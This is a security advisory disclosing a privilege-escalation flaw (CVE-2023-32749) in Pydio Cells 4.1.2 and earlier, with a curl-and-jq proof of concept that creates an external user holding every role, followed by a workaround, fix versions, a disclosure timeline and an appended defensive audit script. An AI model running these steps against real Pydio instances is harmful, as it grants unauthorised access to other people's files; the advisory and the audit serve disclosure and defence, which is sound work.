Pydio Cells 4.1.2 Privilege Escalation
Pydio Cells versions 4.1.2 and below suffer from a privilege escalation vulnerability. It allows users, by default, to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted.
Advisory: Pydio Cells: Unauthorised Role Assignments

Pydio Cells allows users by default to create so-called external users
in order to share files with them. By modifying the HTTP request sent
when creating such an external user, it is possible to assign the new
user arbitrary roles. By assigning all roles to a newly created user,
access to all cells and non-personal workspaces is granted.

Details
=======

Product: Pydio Cells
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Privilege Escalation
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003
Advisory Status: published
CVE: CVE-2023-32749
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749

Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)

More Details
============

Users can share cells or folders with other users on the same Pydio
instance. The web application allows either selecting an already
existing user from a list or creating a new user by entering a new
username and password, if this functionality is enabled.

When creating a new user in this way, an HTTP PUT request like the
following is sent:

------------------------------------------------------------------------
PUT /a/user/newuser HTTP/2
Host: example.com
User-Agent: agent
Authorization: Bearer O48gvjD[...]
Content-Type: application/json
Content-Length: 628
Cookie: token=AO[...]

{
  "Attributes": {
    "profile": "shared",
    "parameter:core.conf:lang": "\"en-us\"",
    "send_email": "false"
  },
  "Roles": [],
  "Login": "newuser",
  "Password": "secret!",
  "GroupPath": "/",
  "Policies": [...]
}
------------------------------------------------------------------------

The JSON object sent in the body contains the username and password
for the user to be created and an empty list for the key "Roles". The
response contains a JSON object similar to the following:

------------------------------------------------------------------------
{
  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
  "GroupPath": "/",
  "Attributes": {
    "parameter:core.conf:lang": "\"en-us\"",
    "profile": "shared"
  },
  "Roles": [
    {
      "Uuid": "EXTERNAL_USERS",
      "Label": "External Users",
      "Policies": [...]
    },
    {
      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",
      "Label": "User newuser",
      "UserRole": true,
      "Policies": [...]
    }
  ],
  "Login": "newuser",
  "Policies": [...],
  "PoliciesContextEditable": true
}
------------------------------------------------------------------------

The key "Roles" now contains a list with two objects, which seem to be
applied by default. The roles list in the HTTP request can be
modified to contain a list of all available UUIDs for roles, which can
be obtained by using the user search functionality. This results in a
new user account with all roles applied. By performing a login as the
newly created user, access to all cells and non-personal workspaces of
the whole Pydio instance is granted.

Proof of Concept
================

Log in to the Pydio Cells web interface with a regular user and retrieve
the JWT from the HTTP requests.
This can either be done using an HTTP attack proxy or using the
browser's developer tools. Subsequently, curl [1] can be used as follows
to retrieve a list of all users and their roles (the bearer token must be
the one stored in JWT):

------------------------------------------------------------------------
$ export JWT="<insert JWT here>"
$ curl --silent \
    --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --data '{}' \
    https://example.com/a/user | tee all_users.json
{"Users":[...]}
------------------------------------------------------------------------

Afterwards, jq [2] can be used to create a JSON document which can be
sent to the Pydio REST-API in order to create the external user "foobar"
with the password "hunter2" and all roles assigned:

------------------------------------------------------------------------
$ jq '.Users[].Roles' all_users.json \
    | jq -s 'flatten | .[].Uuid | {Uuid: .}' \
    | jq -s 'unique' \
    | jq '{"Login": "foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \
    | tee create_user.json
{
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
}
------------------------------------------------------------------------

Finally, the following curl command can be issued to create the new
external user:

------------------------------------------------------------------------
$ curl --request PUT \
    --silent \
    --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --data @create_user.json \
    https://example.com/a/user/foobar
------------------------------------------------------------------------

Now, log in as the newly created user to access all cells and
non-personal workspaces.

Workaround
==========

Disallow the creation of external users in the authentication settings.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

Attackers with access to any regular user account for a Pydio Cells
instance can extend their privileges by creating a new external user
with all roles assigned. Subsequently, they can access all folders and
files in any cell and workspace, except for personal workspaces. The
creation of external users is activated by default. Therefore, the
vulnerability is estimated to pose a high risk.

Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Alter Posthof 1                             Fax : +49 241 510081-99
52062 Aachen                                https://www.redteam-pentesting.de
Germany                                     Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
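As an added, defender-side example (not part of the advisory or of Pydio Cells): an audit over the user listing returned by /a/user, as described in the advisory above, that flags external users whose roles go beyond the two defaults shown in the response (EXTERNAL_USERS and the user's own per-user role). The sample listing is constructed; all UUIDs except the advisory's own user UUID are placeholders.

```python
import json

# Role every external ("shared" profile) user receives by default, as seen in
# the /a/user response reproduced in the advisory.
DEFAULT_EXTERNAL_ROLE = "EXTERNAL_USERS"

def is_external(user):
    """External users carry the profile attribute "shared"."""
    return user.get("Attributes", {}).get("profile") == "shared"

def unexpected_roles(user):
    """Role UUIDs an external user should not carry: anything other than
    EXTERNAL_USERS and the user's own per-user role (UserRole, Uuid == user)."""
    own_uuid = user.get("Uuid")
    extra = []
    for role in user.get("Roles", []):
        uuid = role.get("Uuid")
        if uuid == DEFAULT_EXTERNAL_ROLE:
            continue
        if role.get("UserRole") and uuid == own_uuid:
            continue
        extra.append(uuid)
    return extra

def audit(users_json):
    """Return {login: [unexpected role UUIDs]} for every external user that
    carries roles beyond the two defaults; an empty dict means all clear."""
    findings = {}
    for user in json.loads(users_json).get("Users", []):
        if is_external(user):
            extra = unexpected_roles(user)
            if extra:
                findings[user["Login"]] = extra
    return findings

# Constructed sample in the shape of the advisory's /a/user response:
# "newuser" carries only the defaults, "foobar" additionally carries the UUID
# of an internal role, as a user created from an injected Roles list would.
NEWUSER_UUID = "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce"   # from the advisory
FOOBAR_UUID = "aaaaaaaa-1111-2222-3333-444444444444"    # constructed
INTERNAL_ROLE = "bbbbbbbb-5555-6666-7777-888888888888"  # constructed
SAMPLE_USERS = json.dumps({"Users": [
    {"Uuid": NEWUSER_UUID, "Login": "newuser", "Attributes": {"profile": "shared"},
     "Roles": [{"Uuid": "EXTERNAL_USERS"}, {"Uuid": NEWUSER_UUID, "UserRole": True}]},
    {"Uuid": FOOBAR_UUID, "Login": "foobar", "Attributes": {"profile": "shared"},
     "Roles": [{"Uuid": "EXTERNAL_USERS"}, {"Uuid": FOOBAR_UUID, "UserRole": True},
               {"Uuid": INTERNAL_ROLE}]},
]})

if __name__ == "__main__":
    print(audit(SAMPLE_USERS))  # {'foobar': ['bbbbbbbb-5555-6666-7777-888888888888']}
```

Run it against the all_users.json saved by the first curl command of the proof of concept; any login listed in the result is an external account that was granted roles the normal sharing flow never assigns.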